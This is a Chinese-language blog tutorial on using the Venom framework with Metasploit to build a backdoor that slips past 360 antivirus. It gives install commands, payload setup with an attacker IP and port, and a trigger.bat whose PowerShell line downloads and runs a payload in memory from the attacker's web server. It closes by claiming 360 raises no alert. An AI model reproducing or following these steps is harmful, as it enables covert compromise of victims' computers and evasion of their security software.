Venom 結(jié)合 Metasploit繞過360

下載安裝

下載地址:https://github.com/r00t-3xp10it/venom

1.從Github上下載框架,你可以下載到以下格式:

tar.gz OR zip OR git clone

2.賦予文件可執(zhí)行權(quán)限:

cd venom-main

sudo chmod -R +x *.sh

sudo chmod -R +x *.py

3.安裝依賴關(guān)系包:

cd aux

sudo ./setup.sh

4.運行

sudo ./venom.sh

使用步驟:

1.上圖這里的模塊比較多有?apk(安卓)/exe/php/vbs/bat/?等格式。在這里我以?11號?模塊為例:


2. 填寫攻擊者的?IP?以及?端口


3.填寫?后門名稱


4. 填寫后門?監(jiān)聽模塊類型


4. 查看?outoput?輸出文件。

5.這里選擇?msf?的后門模塊,選擇完后會自動幫你設(shè)置相關(guān)參數(shù),—-更加自動化,懶人化。


6.我們這里只需要 trigger.bat 文件,到目標(biāo)系統(tǒng)運行一次即可!

在此之前,我們簡單查看下?bat?文件的內(nèi)容。這里需要我們把?xxxx.ps1?文件,放到?web?服務(wù)器上。 讓?powershell?去遠(yuǎn)程下載木馬文件。

:: powershell template | Author: r00t-3xp10it

:: Matthew Graeber - DownloadString

:: Download/execute payload in RAM

:: ---

@echo off

echo [*] Please wait, preparing software ...

powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.149/demon.ps1')

7.開啟?kali?下的?apache?服務(wù),將?xxxx.ps1丟到?/var/www/?目錄下,以便讓木馬文件訪問攻擊者?web?地址。

service apache2 start

8.準(zhǔn)備工作完成,將?trigger.bat?文件丟到目標(biāo)系統(tǒng),可以嘗試使用?360?掃描檢查??梢钥吹剑?60 并未做任何攔截及報毒

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 免殺powershell 繞過 小白看了各種大佬做的免殺文章感覺太神奇了,于是自己也做了一個………….有點low,...
    F1_bd2c閱讀 4,165評論 1 10
  • 進入帶空格的文件或者文件夾 Linux文件權(quán)限詳解 文件和目錄權(quán)限概述 在linux中的每一個文件或目錄都包含有訪...
    annkee閱讀 2,792評論 0 4
  • 6月7日,莘莘學(xué)子高考的日子,2018年6月7日,我高考10周年的日子。再次感覺到了歲月如梭。 很高興開頭用對了“...
    dc的夢囈閱讀 235評論 0 1
  • https://github.com/kdn251/interviews https://github.com/c...
    dubingxin閱讀 112評論 0 0
  • 2019年就剩兩天了,2020年的你我距離那一天,過去了9年。 2019初的冬天,我還在懷疑是不是重新開始了,站在...
    白粥黑糖閱讀 90評論 0 0

友情鏈接更多精彩內(nèi)容